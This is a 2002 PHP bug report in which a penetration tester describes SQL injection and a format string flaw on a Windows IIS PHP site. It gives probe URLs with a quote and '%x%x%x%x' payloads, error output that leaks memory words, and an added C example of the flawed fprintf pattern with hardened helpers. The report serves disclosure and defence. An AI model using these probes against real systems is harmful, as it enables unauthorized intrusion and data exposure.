Bug #20124 Remote Format String Bug
Submitted: 2002-10-27 13:04 UTC Modified: 2002-10-27 18:45 UTC
From: mark at ngssoftware dot com Assigned:
Status: Not a bug Package: IIS related
PHP Version: 4.2.3 OS: Win2k
Private report: No CVE-ID: None
 [2002-10-27 13:04 UTC] mark at ngssoftware dot com
During a Pentest, I was searching for sql injection, and noticed that PHP returned the following error

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ')'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ')'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510')
 
Indicating SQL injection.  By entering 

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'A

You will notice that the returned error message shows the 'A

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'A)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near 'A)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'A)
 
To test for the possibility of a Format String I entered the following

http://victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'%x%x%x%x

You will note from the Error logs that a format string bug is present in Four different fields

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '51275075127680)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near '10081b6e0ffffffffdf1eb0)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'12fbe8cf7124b4a018b46030)
 
This format string bug is NOT dependent on there being SQL injection present.  To get the format string you just have to cause an error, for example

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510>

This obviously indicates that the Format String is in the Error Handling process.

Regards

Mark Litchfield
www.ngssoftware.com
Tel +44 1241 431367
email: mark@ngssoftware.com
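An added illustration, not code from this report or from the vendor's odbc2.c (whose source is not shown here): the hypothetical sql_prepare error path assumed below hands the driver diagnostic, which still embeds the request parameter, to a printf-style call as its format string, which is the behaviour the report describes. The hardened version keeps user data in an argument slot, and two helpers let a logging layer that cannot be changed detect or neutralise stray directives.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Vulnerable pattern (shown only, never called): the diagnostic text,
 * which carries the attacker-controlled faq_id, becomes the format.
 *
 *   void report_error_bad(const char *diag) { fprintf(stderr, diag); }
 *
 * With faq_id = "510'%x%x%x%x" each %x is expanded by fprintf, which is
 * exactly why the dumps above show hex words in place of the parameter. */

/* Hardened: user-derived text is always an argument, never the format.
 * Returns a static buffer so the result can be inspected by a caller. */
static char g_msg[256];
const char *report_error(const char *file, int line, const char *fn,
                         const char *diag)
{
    snprintf(g_msg, sizeof g_msg,
             "File: %s\nLine: %d\nIn Fcn.: %s\nDescription: %s\n",
             file, line, fn, diag);
    return g_msg;
}

/* Returns 1 if the text holds a conversion directive ('%' not followed
 * by another '%'), i.e. it must never be used as a format string. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s == '%') {
            if (s[1] == '%') { s++; continue; }
            return 1;
        }
    }
    return 0;
}

/* Doubles every '%' so the text survives a printf-style logger intact.
 * Returns NULL if the escaped text would not fit the static buffer. */
static char g_esc[64];
const char *escape_percent(const char *src)
{
    size_t n = 0;
    for (; *src; src++) {
        size_t need = (*src == '%') ? 2 : 1;
        if (n + need >= sizeof g_esc) return NULL;   /* keep room for NUL */
        if (*src == '%') g_esc[n++] = '%';
        g_esc[n++] = *src;
    }
    g_esc[n] = '\0';
    return g_esc;
}
```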

 [2002-10-27 14:24 UTC] sniper@php.net
What exactly do you think the bug is here?
And have you ever read this:

http://www.php.net/manual/en/security.cgi-bin.php

 [2002-10-27 18:45 UTC] iliaa@php.net
Sorry, but your problem does not imply a bug in PHP itself.  For a
list of more appropriate places to ask for help using PHP, please
visit http://www.php.net/support.php as this bug system is not the
appropriate forum for asking support questions. 

Thank you for your interest in PHP.

You should validate user passed input before inserting it into your SQL queries.
 